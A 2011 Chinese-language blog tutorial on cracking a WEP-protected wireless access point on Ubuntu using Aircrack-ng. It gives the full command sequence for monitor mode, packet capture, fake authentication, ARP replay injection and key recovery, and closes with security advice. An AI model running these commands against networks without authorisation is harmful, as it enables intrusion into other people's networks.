搜尋本站文章

2011年1月11日 星期二

你的無線 AP 讓我『上』一下!如何利用 ubuntu 破解無線 AP?

資訊爆炸的時代,資訊安全也日益顯得重要,無線網路的訊號屬於對外無限制散射的,所以在安全性上一定有先天上的缺陷。這篇主要著墨於讓各位瞭解並不需要太多的技術,滲透你我的網路安全是如此的容易,稍微引導一個網路安全概念及習慣的觀念。


既然要在『ubuntu』上,當然要先準備破解無線網路工具,為各位介紹這套『Aircrack-ng』,『Aircrack-ng』工具包有很多工具,工具主要有以下幾個:

airmon-ng』處理網卡工作模式
airodump-ng』抓包
aircrack-ng』破解
aireplay-ng』發包、干擾

有人可能在下載的時候會遇到防毒軟體警告,筆者是使用『Avira』小紅傘 10 也有提示警告,一般來說大家使用的『註冊機』、『破解』軟體,大多是屬於攻擊型軟體,防毒軟體一般來說都會將之列為危險警告,如果各位還是有不放心的疑慮,可以看看本文就好了!這邊附上一則連結:『Aircrack-ng - 掃描病毒和間諜軟體結果

進入主題開始

在終端機中輸入以下指令安裝 aircrack-ng

sudo apt-get install aircrack-ng


接著在終端機中輸入以下指令啟動無線網卡的監控模式。註(1)
sudo airmon-ng start wlan0

查看有哪些 AP 在附近,在終端機中輸入以下指令,然後『Ctrl』+『C』退出,保留終端機別關閉

sudo airodump-ng mon0

再來進行抓包,開啟另一個終端機輸入以下。註(2)
sudo airodump-ng -c 6 –bssid 11:22:33:44:55:66 -w  wep mon0
* 說明:
c』後面的 6 是要破解 AP 的工作頻道。
bissid』後面的 11:22:33:44:55:66 是要破解 AP 的 MAC 位址。
w』後面是抓取的數據包文件名,文件名隨意但要記得,後面要用到。
註(1) 可以查看正在工作的 AP 頻道(ch)和 MAC 位址

再來輸入破解與目標 AP 建立虛擬連接,另開一個終端機輸入以下指令
sudo aireplay-ng -1 0 -a 11:22:33:44:55:66 -h aa:bb:cc:dd:ee:ff  mon0
* 說明:
『h』後面的 aa:bb:cc:dd:ee:ff 是自己無線網卡的 MAC 位置,如不清楚可以在終端機輸入 ifconfig 查看

此時順利的話,應該成功建立虛擬連接後終端機中輸入以下,輸入破解為了加快抓包的速度
sudo aireplay-ng -2 -F -p 0841 -c ff:ff:ff:ff:ff:ff -b 11:22:33:44:55:66 -h aa:bb:cc:dd:ee:ff mon0


收集 15000建議) 個以上的數據後,另開一個終端機輸入進行解碼。

sudo aircrack-ng wep*.cap
注意:這裡輸入的文件名要和註(2)一致。

 休息一下等破解出密碼後在終端中輸入最後動作,關閉監控模式,否則無線網卡還會持續向目標 AP 進行輸入。
sudo airmon-ng stop mon0


其實這種方法算是比較『溫和』的,還有『機車』的玩法主動送出連線封包,因為內容有暴力血腥成份,所以....改天再說囉!

整個過程中比較花時間的就是收集可供計算比對數據的過程,如果面對使用率高的 AP的話,整個時間基本上還可以縮短。無線加密的『WEP』就這樣給它解開了,根據『Aircrack-ng』的說明中提到『WPA/WPA2』也是可以被破解的。

筆者這種外行人很單純的抓現成的程式稍微閱讀一下說明文件,直接 Run 一下就成功破解輕易搞定,面對各大作業系統一窩蜂往雲端飛奔而去,而正在使用無線網路的你該怎麼能放心個人情資的外洩呢?

到這應該有些人的想法認為『我家裡的 AP 讓別人用又沒關係,不要佔用過多的頻寬影響到我正常上網就好了。』。基本上對方如果只是單純『借用一下!』,那真的該謝天謝地了!如果 AP 被『閒雜人等』借用了,便可以藉由你的 IP 當作一個出口的跳板(亞洲聞名世界的殭屍電腦就是經由跳板攻擊)來搞些見光死的事(盜帳號變賣虛寶、亂發言(信)、散播病毒、盜用他人網路銀行帳號、上傳色情圖片到討論區等等),等到出事偵後九隊、電信警察、管區警察根據來源 IP 追查到你這時,大家還會這麼率性的沒關係嗎?

檢查下自己的 AP 設定吧!如果 AP 採用 WEP 加密,筆者真的建議改為 WPA/WPA2 ,同時在 AP上設定可存取的 MAC Address 清單限制,內心會稍微........安全一點!

對這方面意尤未盡還有興趣的朋友,可以上網搜尋更多相關資料,在此筆者就不多作贅述。也歡迎大家可以投稿發表討論!


===============================================
軟體名稱:Aircrack-ng
官方網站:http://www.aircrack-ng.org/doku.php?id=airmon-ng
語言種類:英文

創用 CC 授權條款

沒有留言:

張貼留言

1、本留言處歡迎多加留言交流,但不歡迎垃圾留言及廣告留言
2、留言時可以使用部份 HTML 標記
3、對於教學文章介紹或軟體使用有問題歡迎提出,若站長沒回應表示不清楚該問題的解決方案
4、留言時請勿留下電子郵件,以免因搜尋引擎爬文而造成您的困擾,且站長不會寄相關郵件給您,僅會在留言區提供解決方案
5.站長保留不當刪除留言的權力,若造成不便尚請見諒